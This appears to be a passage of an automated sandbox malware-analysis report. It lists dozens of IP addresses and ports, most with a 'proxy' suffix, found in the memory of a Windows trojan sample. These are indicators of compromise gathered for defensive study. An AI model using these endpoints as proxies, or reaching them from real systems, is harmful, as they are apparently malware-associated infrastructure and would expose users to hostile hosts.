                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.141.81.209:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.141.81.209:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.100.145:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.100.145:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.103.41:88
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.103.41:88://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.179.239:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.179.239:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.219.13:4228
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.219.13:4228://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAF0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.219.250:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.219.250:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.98.204:11232
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.98.204:11232://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.98.204:22019
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.98.204:22019://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.98.204:2662
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.98.204:2662://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA533000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.98.204:3240
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA533000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.98.204:3240://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAC33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.98.204:37901
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.98.204:37901://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C70EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.98.204:53935
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C70EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.98.204:53935://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.98.204:58199
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.161.98.204:58199://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C823C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C81FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.165.2.223:3629
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C81F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.165.2.223:3629://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.180.19.209:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.180.19.209:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.183.179.117:45698
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.183.179.117:45698://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.189.146.57
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.189.146.57://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.189.146.57:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.189.184.6
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.189.184.6://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.189.184.6:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.2.76.163:17000
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.2.76.163:17000://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.201.140.196:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.201.140.196:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCB1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAA65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.202.104.22:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.202.104.22:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.202.120.214:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.202.120.214:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.252.23.206:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.252.23.206:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.252.23.206:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.252.23.206:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.252.23.220:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.252.23.220:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.252.23.220:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.252.23.220:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6C98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.252.23.249:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6C98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.252.23.249:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.252.23.249:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.252.23.249:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7FC8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.74.179:36457
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7FC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.74.179:36457://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.78.239:15758
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.78.239:15758://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.78.239:31862
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.78.239:31862://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.78.239:32092
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6D25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.78.239:32092://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.78.239:32092x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C82FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.81.57:14021
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8285000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.81.57:14021://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7652000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.81.57:30829
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7652000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.81.57:30829://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.81.57:32105
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.81.57:32105://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.44.42.115:58386
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.44.42.115:58386://proxyHJ
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.44.42.82:10808
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.44.42.82:10808://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C69FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.56.124.176:6734
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C69FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.56.124.176:6734://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.58.53.216:1085
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.58.53.216:1085://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.58.97.89:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.58.97.89:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7823000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.61.41.220:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7823000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.61.41.220:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.75.155.221:8888
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.75.155.221:8888://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.78.44.6:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.78.44.6:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.78.89.192:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.78.89.192:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.78.89.192:8080x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.9.98.142:2692
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.9.98.142:2692://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CAB000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.9.98.142:3000://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.9.98.142:3000P
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.9.98.142:3080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.9.98.142:3080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.9.98.142:3129
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.9.98.142:3129://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.9.98.142:3233
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.9.98.142:3233://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.9.98.142:3629
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C804E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.9.98.142:3629://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.113.36.155:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.113.36.155:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD0E5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.116.14.201:7497
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD0E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.116.14.201:7497://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.122.86.118
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.122.86.118://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.122.86.118:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.166
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.166://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.176
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.176://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.176:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.177
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.177://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.177:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.178
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.178://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.179
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.179://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C77A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.180
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.180://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.181
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.181://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.182
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C695D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.182://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C755B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.182:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.183
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.183://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://50.168.163.183:80
